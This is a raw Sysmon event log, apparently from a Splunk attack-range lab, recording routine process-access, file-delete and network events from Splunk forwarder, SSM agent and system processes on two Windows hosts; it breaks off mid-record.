10:47:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-10D7-6216-4804-000000003902}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-10D7-6216-4804-000000003902}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.514{4F8D34B0-10D7-6216-4804-000000003902}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:52.985{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1893577A9E55630B9FBF272CD5EE4E23,SHA256=1F6BADDC2214F3A03290EE4B85511F5F4773A907F07AB46976360FEDFB72B179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:52.811{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9AC95081F0BBC28C84E45EE1A720356,SHA256=1C05ECDE4483FC1D8D00F52F07B14ECE6DDCD542CDD60BBA92983A39E2EDD73D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:52.576{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83E690CAFA7994DB62574D2230B110D9,SHA256=2BA7629D1565F7F6694177EB9BDAB10B930942A913CAB1BC1B0BCFE0FC38A4D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:53.826{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C786C8C0B9A6A6473BD9DBE299246B9,SHA256=41DE5FF8A1DE9CBDBC520A8292CD719FA59C5276052A32770D05B8A62D26C1A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:53.688{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-131MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:54.840{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE49FE5E56AB40F66DCA2D41991F4813,SHA256=01B8A78F4BBA6309B9D1FEA59970DE9F982C30E151E01753ED57495D220312AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:52.724{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53398-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000287197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:51.362{C8EA50B7-F133-6215-4500-000000003802}3792C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53397-false169.254.169.254-80http 354300x8000000000000000287196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:51.361{C8EA50B7-F133-6215-4500-000000003802}3792C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53396-false169.254.169.254-80http 23542300x8000000000000000287195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:54.219{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDA622E421480C2F9E01757F5E6D9D1A,SHA256=450A9B8941950688E89EE7BB265CDDA056A5E7E2F4989C3206A000FA7428F602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:54.702{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-132MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:51.689{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51307-false10.0.1.12-8000- 23542300x8000000000000000216188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:55.842{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E82C48B5D34AFA6D74D8C7B58926A519,SHA256=3A94F8B56805880B2F48F7FCA54F1E3F4516F3F0216368AB35441652E8D7B6C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:55.235{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91CA98B11F6D7791429C1723F489C75F,SHA256=3BE64BBDAA9E2C3039B1BDF9846490E46357149035B852CFF761296B1D835960,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:56.858{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18208002B7223E27F7A5B939423AAD66,SHA256=B1E78910851C28BAF140A91BEE047CA0D304DDAD1E817094A56C65D834102B42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:56.251{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3929DEECA59753F06C2DD7665D0DC9E7,SHA256=36C573FE4704669C1B8A6909FDCF4C2D59A6F20006981721763C478CCA65DD76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:57.874{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D90608B229425317AEE666F500CD1A0,SHA256=45949C276043DB6EAA7120B3F0BA9BD1207A79C124811BC1D2D96D13082ADC31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:57.313{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E72A357B32F8BB2B4927A48C41ABE975,SHA256=C5B4F6AAC3DFEE272FDEE2514999D15A130EF6AA59BDEDD516BA212014A3ADE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:58.889{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E154E38E6ADCA23E1AE6F8E778BA68FB,SHA256=74F2446E23F02080BE86CF715DA84B1CABE24C87CA27327B34E151B570AA05C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:58.360{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00248D95F01B73919EEB90871D6120A6,SHA256=8949A1EBD1F845A7EC3D1AD46F4A13C84100E902E318D96B63F14EB74F4615CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:59.905{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3E9A31587DB35C28D4076A24B37143D,SHA256=40E720F9AA3DC3C56D3AF809E5A61C68EA1981D81FDAC362FC4ECFD35AF8B186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:59.376{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFD2C27ACAA7B43BF43E06E4D3C53D99,SHA256=FF298A679E903E1C1C2D664EA66C7C14F9D77BE5EE038E23A741212C32E28F57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:00.920{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=641365F8DAF44833E8008D52506E1A2B,SHA256=20228CF4352C6D61D8DE5F1D54AD3168DB5A67758A62F0EEC1B0086A64F4C4DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:58.693{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53399-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:00.376{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04D91BAEB403DA75EA302A59ECCBCA6F,SHA256=85A7F93E4E2A6B4B406177125456C88E660566E52A035A76A9BA96B6AE7C1B25,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:57.611{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51308-false10.0.1.12-8000- 23542300x8000000000000000216195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:01.936{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88091D2C51A63A828830159048FDA24E,SHA256=6A9BA5D0A39152E1F35162A622B0E13E6DB1715E6476347979E816FF11C763CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:01.876{C8EA50B7-10E1-6216-F704-000000003802}56044816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 